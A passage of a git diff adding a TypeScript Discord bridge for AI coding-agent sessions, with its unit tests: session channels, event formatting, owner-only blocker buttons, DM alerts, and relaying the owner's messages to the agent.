assert.ok(sessionManager.listenerCount('session:blocked') > 0); + assert.ok(sessionManager.listenerCount('session:completed') > 0); + assert.ok(sessionManager.listenerCount('session:error') > 0); + assert.ok(client.listenerCount('messageCreate') > 0); + }); + + it('stop() unsubscribes from all events and clears mappings', async () => { + const { bridge, sessionManager, client } = buildBridge(); + bridge.start(); + await bridge.stop(); + assert.equal(sessionManager.listenerCount('session:started'), 0); + assert.equal(sessionManager.listenerCount('session:event'), 0); + assert.equal(sessionManager.listenerCount('session:blocked'), 0); + assert.equal(sessionManager.listenerCount('session:completed'), 0); + assert.equal(sessionManager.listenerCount('session:error'), 0); + assert.equal(client.listenerCount('messageCreate'), 0); + }); + + it('start() is idempotent', () => { + const { bridge, sessionManager } = buildBridge(); + bridge.start(); + bridge.start(); + assert.equal(sessionManager.listenerCount('session:started'), 1); + }); + + it('getVerbosityManager() returns a VerbosityManager', () => { + const { bridge } = buildBridge(); + const vm = bridge.getVerbosityManager(); + assert.ok(vm); + assert.equal(typeof vm.shouldShow, 'function'); + }); + }); + + describe('session:started → channel creation + welcome embed', () => { + it('creates channel and batcher', async () => { + const { bridge, sessionManager, channelManager } = buildBridge(); + bridge.start(); + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + assert.equal(mockFn(channelManager.createProjectChannel).mock.callCount(), 1); + }); + + it('logs error and skips when channel creation fails', async () => { + const failingCm = { + createProjectChannel: mock.fn(async () => { throw new Error('API error'); }), + }; + const { bridge, sessionManager, logger } = buildBridge({ + channelManager: failingCm as unknown as EventBridgeOptions['channelManager'], + }); + bridge.start(); + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + assert.ok(mockFn(logger.error).mock.callCount() > 0); + }); + }); + + describe('session:event → format + verbosity filter + enqueue', () => { + it('formats event and enqueues to batcher (no errors)', async () => { + const { bridge, sessionManager, logger } = buildBridge(); + bridge.start(); + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + sessionManager.emit('session:event', { + sessionId: 'sess-1', projectDir: '/test/project', + event: { type: 'tool_execution_start', name: 'read' } as SdkAgentEvent, + }); + await tick(); + // No errors + assert.equal(mockFn(logger.error).mock.callCount(), 0); + }); + + it('filters events based on verbosity', async () => { + const { bridge, sessionManager, channelManager, logger } = buildBridge(); + bridge.start(); + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + // Set quiet mode + bridge.getVerbosityManager().setLevel('ch-123', 'quiet'); + + // cost_update filtered in quiet + sessionManager.emit('session:event', { + sessionId: 'sess-1', projectDir: '/test/project', + event: { type: 'cost_update', cumulativeCost: 1.5 } as SdkAgentEvent, + }); + await tick(); + // tool_execution_start filtered in quiet + sessionManager.emit('session:event', { + sessionId: 'sess-1', projectDir: '/test/project', + event: { type: 'tool_execution_start', name: 'read' } as SdkAgentEvent, + }); + await tick(); + assert.equal(mockFn(logger.error).mock.callCount(), 0); + }); + }); + + describe('session:blocked → blocker embed + buttons + optional DM', () => { + it('sends blocker embed and creates collector for confirm', async () => { + const { bridge, sessionManager, channelManager } = buildBridge(); + bridge.start(); + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + const blocker: PendingBlocker = { + id: 'blocker-1', method: 'confirm', message: 'Continue?', + event: { id: 'blocker-1', method: 'confirm', message: 'Continue?' } as RpcExtensionUIRequest, + }; + sessionManager.emit('session:blocked', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', blocker, + }); + await tick(); + assert.ok(mockFn(channelManager._channel.createMessageComponentCollector).mock.callCount() > 0); + }); + + it('sends DM when dm_on_blocker is configured', async () => { + const config: DaemonConfig = { + ...DEFAULT_CONFIG, + discord: { ...DEFAULT_CONFIG.discord!, dm_on_blocker: true }, + }; + const client = createMockClient(); + const { bridge, sessionManager } = buildBridge({ config, client }); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + const blocker: PendingBlocker = { + id: 'blocker-1', method: 'input', message: 'Enter API key', + event: { id: 'blocker-1', method: 'input' } as RpcExtensionUIRequest, + }; + sessionManager.emit('session:blocked', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', blocker, + }); + await tick(); + + const usersFetch = (client as unknown as Record).users.fetch; + assert.equal(mockFn(usersFetch).mock.callCount(), 1); + }); + + it('does not send DM when dm_on_blocker is false', async () => { + const client = createMockClient(); + const { bridge, sessionManager } = buildBridge({ client }); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + const blocker: PendingBlocker = { + id: 'blocker-1', method: 'input', message: 'Enter value', + event: { id: 'blocker-1', method: 'input' } as RpcExtensionUIRequest, + }; + sessionManager.emit('session:blocked', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', blocker, + }); + await tick(); + + const usersFetch = (client as unknown as Record).users.fetch; + assert.equal(mockFn(usersFetch).mock.callCount(), 0); + }); + }); + + describe('button collector → resolveBlocker', () => { + it('resolves blocker on button click from authorized user', async () => { + const { bridge, sessionManager, channelManager } = buildBridge(); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + const blocker: PendingBlocker = { + id: 'blocker-1', method: 'confirm', message: 'Confirm?', + event: { id: 'blocker-1', method: 'confirm' } as RpcExtensionUIRequest, + }; + sessionManager.emit('session:blocked', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', blocker, + }); + await tick(); + + const collectorCalls = mockFn(channelManager._channel.createMessageComponentCollector).mock.calls; + assert.ok(collectorCalls.length > 0); + const collector = collectorCalls[0]!.result as EventEmitter; + + const mockInteraction = { + customId: 'blocker:blocker-1:confirm:true', + user: { id: 'owner-1' }, + update: mock.fn(async () => {}), + reply: mock.fn(async () => {}), + }; + collector.emit('collect', mockInteraction); + await tick(); + + assert.equal(mockFn(sessionManager.resolveBlocker).mock.callCount(), 1); + const args = mockFn(sessionManager.resolveBlocker).mock.calls[0]!.arguments; + assert.equal(args[0], 'sess-1'); + assert.equal(args[1], 'true'); + }); + + it('rejects button click from unauthorized user', async () => { + const { bridge, sessionManager, channelManager } = buildBridge(); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + const blocker: PendingBlocker = { + id: 'blocker-1', method: 'confirm', message: 'Confirm?', + event: { id: 'blocker-1', method: 'confirm' } as RpcExtensionUIRequest, + }; + sessionManager.emit('session:blocked', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', blocker, + }); + await tick(); + + const collectorCalls = mockFn(channelManager._channel.createMessageComponentCollector).mock.calls; + const collector = collectorCalls[0]!.result as EventEmitter; + + const mockInteraction = { + customId: 'blocker:blocker-1:confirm:true', + user: { id: 'stranger-99' }, + update: mock.fn(async () => {}), + reply: mock.fn(async () => {}), + }; + collector.emit('collect', mockInteraction); + await tick(); + + assert.equal(mockFn(sessionManager.resolveBlocker).mock.callCount(), 0); + assert.equal(mockFn(mockInteraction.reply).mock.callCount(), 1); + }); + + it('posts error when resolveBlocker throws', async () => { + const { bridge, sessionManager, channelManager } = buildBridge(); + sessionManager.resolveBlocker = mock.fn(async () => { throw new Error('No pending blocker'); }); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + const blocker: PendingBlocker = { + id: 'blocker-1', method: 'confirm', message: 'Confirm?', + event: { id: 'blocker-1', method: 'confirm' } as RpcExtensionUIRequest, + }; + sessionManager.emit('session:blocked', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', blocker, + }); + await tick(); + + const collectorCalls = mockFn(channelManager._channel.createMessageComponentCollector).mock.calls; + const collector = collectorCalls[0]!.result as EventEmitter; + + const mockInteraction = { + customId: 'blocker:blocker-1:confirm:true', + user: { id: 'owner-1' }, + update: mock.fn(async () => {}), + reply: mock.fn(async () => {}), + }; + collector.emit('collect', mockInteraction); + await tick(); + + assert.equal(mockFn(mockInteraction.reply).mock.callCount(), 1); + const replyArg = mockFn(mockInteraction.reply).mock.calls[0]!.arguments[0] as Record; + assert.ok(String(replyArg.content).includes('Failed to resolve')); + }); + }); + + describe('messageCreate relay', () => { + it('relays message to session steer when no pending blocker', async () => { + const session = createMockSession(); + const { bridge, sessionManager, client } = buildBridge(); + sessionManager.getSession = mock.fn(() => session); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + const msg = { + author: { id: 'owner-1', bot: false }, + channelId: 'ch-123', + content: 'check the test results', + react: mock.fn(async () => {}), + reply: mock.fn(async () => {}), + }; + client.emit('messageCreate', msg); + await tick(); + + assert.equal(mockFn(session.client.steer).mock.callCount(), 1); + assert.equal(mockFn(session.client.steer).mock.calls[0]!.arguments[0], 'check the test results'); + }); + + it('resolves blocker via relay for input method', async () => { + const blocker: PendingBlocker = { + id: 'blocker-2', method: 'input', message: 'Enter value', + event: { id: 'blocker-2', method: 'input' } as RpcExtensionUIRequest, + }; + const session = createMockSession({ pendingBlocker: blocker, status: 'blocked' }); + const { bridge, sessionManager, client } = buildBridge(); + sessionManager.getSession = mock.fn(() => session); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + const msg = { + author: { id: 'owner-1', bot: false }, + channelId: 'ch-123', + content: 'my-api-key-value', + react: mock.fn(async () => {}), + reply: mock.fn(async () => {}), + }; + client.emit('messageCreate', msg); + await tick(); + + assert.equal(mockFn(sessionManager.resolveBlocker).mock.callCount(), 1); + assert.equal(mockFn(sessionManager.resolveBlocker).mock.calls[0]!.arguments[1], 'my-api-key-value'); + }); + + it('ignores bot messages', async () => { + const session = createMockSession(); + const { bridge, sessionManager, client } = buildBridge(); + sessionManager.getSession = mock.fn(() => session); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + client.emit('messageCreate', { + author: { id: 'bot-1', bot: true }, + channelId: 'ch-123', + content: 'automated', + react: mock.fn(async () => {}), + reply: mock.fn(async () => {}), + }); + await tick(); + + assert.equal(mockFn(session.client.steer).mock.callCount(), 0); + }); + + it('ignores messages in non-project channels', async () => { + const session = createMockSession(); + const { bridge, sessionManager, client } = buildBridge(); + sessionManager.getSession = mock.fn(() => session); + bridge.start(); + + client.emit('messageCreate', { + author: { id: 'owner-1', bot: false }, + channelId: 'random-ch-999', + content: 'hello', + react: mock.fn(async () => {}), + reply: mock.fn(async () => {}), + }); + await tick(); + + assert.equal(mockFn(session.client.steer).mock.callCount(), 0); + }); + + it('ignores messages from unauthorized users', async () => { + const session = createMockSession(); + const { bridge, sessionManager, client } = buildBridge(); + sessionManager.getSession = mock.fn(() => session); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + client.emit('messageCreate', { + author: { id: 'stranger-99', bot: false }, + channelId: 'ch-123', + content: 'hack the planet', + react: mock.fn(async () => {}), + reply: mock.fn(async () => {}), + }); + await tick(); + + assert.equal(mockFn(session.client.steer).mock.callCount(), 0); + }); + + it('posts error when steer fails', async () => { + const session = createMockSession(); + (session.client as unknown as Record).steer = mock.fn(async () => { + throw new Error('session dead'); + }); + const { bridge, sessionManager, client } = buildBridge(); + sessionManager.getSession = mock.fn(() => session); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + const msg = { + author: { id: 'owner-1', bot: false }, + channelId: 'ch-123', + content: 'try this', + react: mock.fn(async () => {}), + reply: mock.fn(async () => {}), + }; + client.emit('messageCreate', msg); + await tick(); + + assert.equal(mockFn(msg.reply).mock.callCount(), 1); + }); + }); + + describe('session:completed → cleanup', () => { + it('posts completion embed and cleans up', async () => { + const { bridge, sessionManager, logger } = buildBridge(); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + sessionManager.emit('session:completed', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + // After cleanup, events for this session are silently ignored + sessionManager.emit('session:event', { + sessionId: 'sess-1', projectDir: '/test/project', + event: { type: 'tool_execution_start', name: 'read' } as SdkAgentEvent, + }); + await tick(); + assert.equal(mockFn(logger.error).mock.callCount(), 0); + }); + }); + + describe('session:error → cleanup', () => { + it('posts error embed and cleans up', async () => { + const { bridge, sessionManager, logger } = buildBridge(); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + sessionManager.emit('session:error', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', error: 'Process crashed', + }); + await tick(); + + const infoCalls = mockFn(logger.info).mock.calls; + assert.ok( + infoCalls.some((c) => String(c.arguments[0]).includes('session error')), + ); + }); + }); +}); diff --git a/packages/daemon/src/event-bridge.ts b/packages/daemon/src/event-bridge.ts new file mode 100644 index 000000000..8df4dfd4e --- /dev/null +++ b/packages/daemon/src/event-bridge.ts @@ -0,0 +1,494 @@ +/** + * event-bridge.ts — Orchestrator wiring SessionManager events through + * formatter → batcher → Discord channels. + * + * Handles: + * - Session lifecycle → Discord channel creation and cleanup + * - Event streaming → format + verbosity filter + batcher + * - Blocker resolution → interactive buttons + text relay + * - Conversation relay → Discord messages forwarded to GSD sessions + * - DM backup → owner gets DM on blocker when dm_on_blocker configured + */ + +import type { Client, Message, TextChannel, MessageComponentInteraction } from 'discord.js'; +import { EmbedBuilder, ComponentType } from 'discord.js'; +import type { SdkAgentEvent } from '@gsd-build/rpc-client'; +import type { Logger } from './logger.js'; +import type { DaemonConfig, PendingBlocker } from './types.js'; +import type { SessionManager } from './session-manager.js'; +import type { ChannelManager } from './channel-manager.js'; +import { MessageBatcher } from './message-batcher.js'; +import { VerbosityManager } from './verbosity.js'; +import { + formatEvent, + formatBlocker, + formatSessionStarted, + formatError, + formatCompletion, +} from './event-formatter.js'; +import { isAuthorized } from './discord-bot.js'; + +// --------------------------------------------------------------------------- +// Types +// --------------------------------------------------------------------------- + +/** Minimal interface for a Discord client — extracted for testability. */ +export interface BridgeClient { + on(event: 'messageCreate', listener: (message: Message) => void): void; + off(event: 'messageCreate', listener: (message: Message) => void): void; + users: { fetch(id: string): Promise<{ send(opts: unknown): Promise }> }; +} + +/** Options for creating an EventBridge. */ +export interface EventBridgeOptions { + sessionManager: SessionManager; + channelManager: ChannelManager; + client: BridgeClient; + config: DaemonConfig; + logger: Logger; + ownerId: string; +} + +// --------------------------------------------------------------------------- +// Collector timeout +// --------------------------------------------------------------------------- + +const BLOCKER_COLLECTOR_TIMEOUT_MS = 24 * 60 * 60 * 1000; // 24 hours + +// --------------------------------------------------------------------------- +// EventBridge +// --------------------------------------------------------------------------- + +export class EventBridge { + private readonly sessionManager: SessionManager; + private readonly channelManager: ChannelManager; + private readonly client: BridgeClient; + private readonly config: DaemonConfig; + private readonly logger: Logger; + private readonly ownerId: string; + + /** sessionId → channelId */ + private readonly sessionToChannel = new Map(); + /** channelId → sessionId */ + private readonly channelToSession = new Map(); + /** sessionId → MessageBatcher */ + private readonly batchers = new Map(); + /** sessionId → TextChannel (cached for send operations) */ + private readonly channels = new Map(); + + private readonly verbosity = new VerbosityManager(); + + /** Bound event handlers for cleanup */ + private boundHandlers: { + started: (...args: unknown[]) => void; + event: (...args: unknown[]) => void; + blocked: (...args: unknown[]) => void; + completed: (...args: unknown[]) => void; + error: (...args: unknown[]) => void; + messageCreate: (msg: Message) => void; + } | null = null; + + constructor(opts: EventBridgeOptions) { + this.sessionManager = opts.sessionManager; + this.channelManager = opts.channelManager; + this.client = opts.client; + this.config = opts.config; + this.logger = opts.logger; + this.ownerId = opts.ownerId; + } + + // ----------------------------------------------------------------------- + // Lifecycle + // ----------------------------------------------------------------------- + + /** Subscribe to SessionManager events and Discord messageCreate. */ + start(): void { + if (this.boundHandlers) return; // already started + + this.boundHandlers = { + started: (data: unknown) => { + void this.onSessionStarted(data as SessionStartedPayload); + }, + event: (data: unknown) => { + void this.onSessionEvent(data as SessionEventPayload); + }, + blocked: (data: unknown) => { + void this.onSessionBlocked(data as SessionBlockedPayload); + }, + completed: (data: unknown) => { + void this.onSessionCompleted(data as SessionCompletedPayload); + }, + error: (data: unknown) => { + void this.onSessionError(data as SessionErrorPayload); + }, + messageCreate: (msg: Message) => { + void this.handleMessageCreate(msg); + }, + }; + + this.sessionManager.on('session:started', this.boundHandlers.started); + this.sessionManager.on('session:event', this.boundHandlers.event); + this.sessionManager.on('session:blocked', this.boundHandlers.blocked); + this.sessionManager.on('session:completed', this.boundHandlers.completed); + this.sessionManager.on('session:error', this.boundHandlers.error); + this.client.on('messageCreate', this.boundHandlers.messageCreate); + + this.logger.info('event bridge started'); + } + + /** Unsubscribe from all events, destroy batchers, clear mappings. */ + async stop(): Promise { + if (this.boundHandlers) { + this.sessionManager.off('session:started', this.boundHandlers.started); + this.sessionManager.off('session:event', this.boundHandlers.event); + this.sessionManager.off('session:blocked', this.boundHandlers.blocked); + this.sessionManager.off('session:completed', this.boundHandlers.completed); + this.sessionManager.off('session:error', this.boundHandlers.error); + this.client.off('messageCreate', this.boundHandlers.messageCreate); + this.boundHandlers = null; + } + + // Destroy all batchers + const destroyPromises: Promise[] = []; + for (const batcher of this.batchers.values()) { + destroyPromises.push(batcher.destroy()); + } + await Promise.allSettled(destroyPromises); + + this.batchers.clear(); + this.sessionToChannel.clear(); + this.channelToSession.clear(); + this.channels.clear(); + + this.logger.info('event bridge stopped'); + } + + /** Expose the verbosity manager for slash-command integration. */ + getVerbosityManager(): VerbosityManager { + return this.verbosity; + } + + // ----------------------------------------------------------------------- + // SessionManager event handlers + // ----------------------------------------------------------------------- + + private async onSessionStarted(data: SessionStartedPayload): Promise { + const { sessionId, projectDir, projectName } = data; + + try { + const channel = await this.channelManager.createProjectChannel(projectDir); + + // Create batcher with channel.send as the send function + const batcher = new MessageBatcher( + async (payload) => { + await channel.send(payload as Parameters[0]); + }, + this.logger, + ); + batcher.start(); + + // Register bidirectional mapping + this.sessionToChannel.set(sessionId, channel.id); + this.channelToSession.set(channel.id, sessionId); + this.batchers.set(sessionId, batcher); + this.channels.set(sessionId, channel); + + // Post welcome embed + const welcome = formatSessionStarted(projectName); + batcher.enqueue(welcome); + + this.logger.info('bridge: session channel created', { + sessionId, + channelId: channel.id, + projectName, + }); + } catch (err) { + // Failure mode: log error, skip streaming for this session + this.logger.error('bridge: channel creation failed', { + sessionId, + projectDir, + error: err instanceof Error ? err.message : String(err), + }); + } + } + + private async onSessionEvent(data: SessionEventPayload): Promise { + const { sessionId, event } = data; + const channelId = this.sessionToChannel.get(sessionId); + if (!channelId) return; // no channel for this session + + // Verbosity filter + const eventType = (event as Record).type as string; + if (!this.verbosity.shouldShow(channelId, eventType)) return; + + const formatted = formatEvent(event, this.ownerId); + const batcher = this.batchers.get(sessionId); + if (batcher) { + batcher.enqueue(formatted); + } + } + + private async onSessionBlocked(data: SessionBlockedPayload): Promise { + const { sessionId, projectName, blocker } = data; + const channel = this.channels.get(sessionId); + if (!channel) return; + + const formatted = formatBlocker(blocker, this.ownerId); + + // Send immediately (bypasses batching for blockers) + const batcher = this.batchers.get(sessionId); + if (batcher) { + await batcher.enqueueImmediate(formatted); + } + + // For select/confirm methods, set up button collector + if (blocker.method === 'select' || blocker.method === 'confirm') { + this.createButtonCollector(sessionId, channel, blocker); + } + + // DM backup + if (this.config.discord?.dm_on_blocker) { + await this.sendBlockerDM(sessionId, projectName, blocker); + } + } + + private async onSessionCompleted(data: SessionCompletedPayload): Promise { + const { sessionId, projectName } = data; + const batcher = this.batchers.get(sessionId); + if (!batcher) return; + + const completion = formatCompletion({ + type: 'execution_complete', + status: 'completed', + } as SdkAgentEvent); + + // Flush through batcher then cleanup + batcher.enqueue(completion); + await this.cleanupSession(sessionId); + + this.logger.info('bridge: session completed', { sessionId, projectName }); + } + + private async onSessionError(data: SessionErrorPayload): Promise { + const { sessionId, projectName, error } = data; + const batcher = this.batchers.get(sessionId); + if (!batcher) return; + + const errorEmbed = formatError(sessionId, error); + batcher.enqueue(errorEmbed); + await this.cleanupSession(sessionId); + + this.logger.info('bridge: session error', { sessionId, projectName, error }); + } + + // ----------------------------------------------------------------------- + // Blocker resolution — button collector + // ----------------------------------------------------------------------- + + private createButtonCollector( + sessionId: string, + channel: TextChannel, + blocker: PendingBlocker, + ): void { + // Create a message collector on the channel for button interactions + // We use createMessageComponentCollector on the channel + try { + const collector = channel.createMessageComponentCollector({ + componentType: ComponentType.Button, + time: BLOCKER_COLLECTOR_TIMEOUT_MS, + filter: (interaction: MessageComponentInteraction) => { + return interaction.customId.startsWith(`blocker:${blocker.id}:`); + }, + }); + + collector.on('collect', async (interaction: MessageComponentInteraction) => { + // Auth guard + if (!isAuthorized(interaction.user.id, this.ownerId)) { + await interaction.reply({ + content: '⛔ Only the project owner can respond to blockers.', + ephemeral: true, + }).catch(() => {}); + return; + } + + // Parse customId: blocker:{id}:{method}:{value} + const parts = interaction.customId.split(':'); + const value = parts[3] ?? ''; + + try { + await this.sessionManager.resolveBlocker(sessionId, value); + await interaction.update({ + content: `✅ Blocker resolved with: ${value}`, + components: [], + }).catch(() => {}); + collector.stop('resolved'); + } catch (err) { + const errMsg = err instanceof Error ? err.message : String(err); + this.logger.error('bridge: blocker resolve failed', { sessionId, error: errMsg }); + await interaction.reply({ + content: `❌ Failed to resolve blocker: ${errMsg}`, + ephemeral: true, + }).catch(() => {}); + } + }); + + collector.on('end', (_collected, reason) => { + if (reason === 'time') { + // Timeout: edit to show expired + this.logger.info('bridge: blocker collector timed out', { sessionId, blockerId: blocker.id }); + // Post a new message indicating expiry — editing original may fail + const batcher = this.batchers.get(sessionId); + if (batcher) { + batcher.enqueue({ + content: `⏰ Blocker response timed out after 24h. Re-posting...`, + embed: new EmbedBuilder() + .setColor(0xf1c40f) + .setTitle('⏰ Blocker Expired') + .setDescription(blocker.message) + .setTimestamp(), + }); + } + } + }); + } catch (err) { + this.logger.error('bridge: collector creation failed', { + sessionId, + error: err instanceof Error ? err.message : String(err), + }); + } + } + + // ----------------------------------------------------------------------- + // DM backup + // ----------------------------------------------------------------------- + + private async sendBlockerDM( + sessionId: string, + projectName: string, + blocker: PendingBlocker, + ): Promise { + try { + const user = await this.client.users.fetch(this.ownerId); + await user.send({ + content: `⚠️ **Blocker** in **${projectName}** — ${blocker.message}\n\nRespond in the project channel.`, + }); + this.logger.debug('bridge: DM sent for blocker', { sessionId, blockerId: blocker.id }); + } catch (err) { + // DM failure is non-fatal — channel message is the primary path + this.logger.warn('bridge: DM send failed', { + sessionId, + error: err instanceof Error ? err.message : String(err), + }); + } + } + + // ----------------------------------------------------------------------- + // Conversation relay — Discord → GSD + // ----------------------------------------------------------------------- + + private async handleMessageCreate(message: Message): Promise { + // Filter: bot messages + if (message.author.bot) return; + + // Filter: must be in a project channel + const sessionId = this.channelToSession.get(message.channelId); + if (!sessionId) return; + + // Filter: must be authorized + if (!isAuthorized(message.author.id, this.ownerId)) return; + + const session = this.sessionManager.getSession(sessionId); + if (!session) return; + + // If session has a pending blocker with input/editor method, resolve it + if (session.pendingBlocker && (session.pendingBlocker.method === 'input' || session.pendingBlocker.method === 'editor')) { + try { + await this.sessionManager.resolveBlocker(sessionId, message.content); + await message.react('✅').catch(() => {}); + this.logger.info('bridge: blocker resolved via relay', { + sessionId, + method: session.pendingBlocker.method, + }); + } catch (err) { + const errMsg = err instanceof Error ? err.message : String(err); + this.logger.error('bridge: relay blocker resolve failed', { sessionId, error: errMsg }); + await message.reply(`❌ Failed to resolve blocker: ${errMsg}`).catch(() => {}); + } + return; + } + + // Otherwise, relay the message to the GSD session + // Use steer() when running (injects mid-turn), prompt() otherwise (starts new turn) + try { + if (session.status === 'running') { + await session.client.steer(message.content); + } else { + await session.client.prompt(message.content); + } + await message.react('📨').catch(() => {}); + this.logger.info('bridge: message relayed to session', { + sessionId, + method: session.status === 'running' ? 'steer' : 'prompt', + }); + } catch (err) { + const errMsg = err instanceof Error ? err.message : String(err); + this.logger.error('bridge: relay failed', { sessionId, error: errMsg }); + await message.reply(`❌ Failed to relay message: ${errMsg}`).catch(() => {}); + } + } + + // ----------------------------------------------------------------------- + // Cleanup + // ----------------------------------------------------------------------- + + private async cleanupSession(sessionId: string): Promise { + const batcher = this.batchers.get(sessionId); + if (batcher) { + await batcher.destroy(); + this.batchers.delete(sessionId); + } + + const channelId = this.sessionToChannel.get(sessionId); + if (channelId) { + this.channelToSession.delete(channelId); + } + this.sessionToChannel.delete(sessionId); + this.channels.delete(sessionId); + } +} + +// --------------------------------------------------------------------------- +// Internal event payload types (matching SessionManager emissions) +// --------------------------------------------------------------------------- + +interface SessionStartedPayload { + sessionId: string; + projectDir: string; + projectName: string; +} + +interface SessionEventPayload { + sessionId: string; + projectDir: string; + event: SdkAgentEvent; +} + +interface SessionBlockedPayload { + sessionId: string; + projectDir: string; + projectName: string; + blocker: PendingBlocker; +} + +interface SessionCompletedPayload { + sessionId: string; + projectDir: string; + projectName: string; +} + +interface SessionErrorPayload { + sessionId: string; + projectDir: string; + projectName: string; + error: string; +} diff --git a/packages/daemon/src/event-formatter.test.ts b/packages/daemon/src/event-formatter.test.ts new file mode 100644 index 000000000..dead1e385 --- /dev/null +++ b/packages/daemon/src/event-formatter.test.ts @@ -0,0 +1,402 @@ +import { describe, it } from 'node:test'; +import assert from 'node:assert/strict'; +import { EmbedBuilder, ActionRowBuilder, ButtonBuilder } from 'discord.js'; +import type { SdkAgentEvent } from '@gsd-build/rpc-client'; +import type { PendingBlocker, FormattedEvent } from './types.js'; +import type { RpcExtensionUIRequest } from '@gsd-build/rpc-client'; +import { + formatToolStart, + formatToolEnd, + formatMessage, + formatBlocker, + formatCompletion, + formatError, + formatCostUpdate, + formatSessionStarted, + formatTaskTransition, + formatGenericEvent, + formatEvent, +} from './event-formatter.js'; + +// --------------------------------------------------------------------------- +// Helpers +// --------------------------------------------------------------------------- + +function embedColor(fe: FormattedEvent): number | null { + return fe.embed?.data.color ?? null; +} + +function embedTitle(fe: FormattedEvent): string | undefined { + return fe.embed?.data.title; +} + +function embedDescription(fe: FormattedEvent): string | undefined { + return fe.embed?.data.description; +} + +// --------------------------------------------------------------------------- +// formatToolStart +// --------------------------------------------------------------------------- + +describe('formatToolStart', () => { + it('produces grey embed with tool name', () => { + const result = formatToolStart({ type: 'tool_execution_start', name: 'read_file' }); + assert.ok(result.content.includes('read_file')); + assert.equal(embedColor(result), 0x95a5a6); // grey + assert.ok(embedTitle(result)?.includes('read_file')); + }); + + it('handles missing name gracefully', () => { + const result = formatToolStart({ type: 'tool_execution_start' }); + assert.ok(result.content.includes('unknown')); + }); + + it('includes input in description when present', () => { + const result = formatToolStart({ type: 'tool_execution_start', name: 'bash', input: 'ls -la' }); + assert.ok(embedDescription(result)?.includes('ls -la')); + }); +}); + +// --------------------------------------------------------------------------- +// formatToolEnd +// --------------------------------------------------------------------------- + +describe('formatToolEnd', () => { + it('shows success icon for normal completion', () => { + const result = formatToolEnd({ type: 'tool_execution_end', name: 'read_file', output: 'done' }); + assert.ok(result.content.includes('✅')); + assert.equal(embedColor(result), 0x95a5a6); // grey + }); + + it('shows error icon and red color for errored tool', () => { + const result = formatToolEnd({ type: 'tool_execution_end', name: 'bash', isError: true }); + assert.ok(result.content.includes('❌')); + assert.equal(embedColor(result), 0xe74c3c); // red + }); + + it('includes duration when present', () => { + const result = formatToolEnd({ type: 'tool_execution_end', name: 'bash', duration: 3500 }); + assert.ok(result.embed?.data.footer?.text?.includes('3.5s')); + }); +}); + +// --------------------------------------------------------------------------- +// formatMessage +// --------------------------------------------------------------------------- + +describe('formatMessage', () => { + it('extracts text from content blocks', () => { + const result = formatMessage({ + type: 'message', + content: [{ type: 'text', text: 'Hello world' }], + }); + assert.ok(embedDescription(result)?.includes('Hello world')); + assert.equal(embedColor(result), 0x3498db); // blue + }); + + it('falls back to message field when content is a string', () => { + const result = formatMessage({ type: 'message', message: 'plain text' }); + assert.ok(embedDescription(result)?.includes('plain text')); + }); + + it('handles empty content blocks', () => { + const result = formatMessage({ type: 'message', content: [] }); + assert.ok(result.content.includes('empty message')); + assert.equal(result.embed, undefined); + }); + + it('handles null content gracefully', () => { + const result = formatMessage({ type: 'message' }); + assert.ok(result.content.includes('empty message')); + }); +}); + +// --------------------------------------------------------------------------- +// formatBlocker — select +// --------------------------------------------------------------------------- + +describe('formatBlocker', () => { + it('produces ActionRow with numbered buttons for select', () => { + const blocker: PendingBlocker = { + id: 'req-1', + method: 'select', + message: 'Choose an option', + event: { + type: 'extension_ui_request', + id: 'req-1', + method: 'select', + title: 'Choose', + options: ['Option A', 'Option B', 'Option C'], + }, + }; + + const result = formatBlocker(blocker, '12345'); + assert.ok(result.content.includes('<@12345>')); + assert.equal(embedColor(result), 0xf1c40f); // yellow + assert.ok(result.components); + assert.ok(result.components!.length > 0); + + // Check buttons + const row = result.components![0]; + const buttons = row.components; + assert.equal(buttons.length, 3); + }); + + it('handles empty options array for select', () => { + const blocker: PendingBlocker = { + id: 'req-2', + method: 'select', + message: 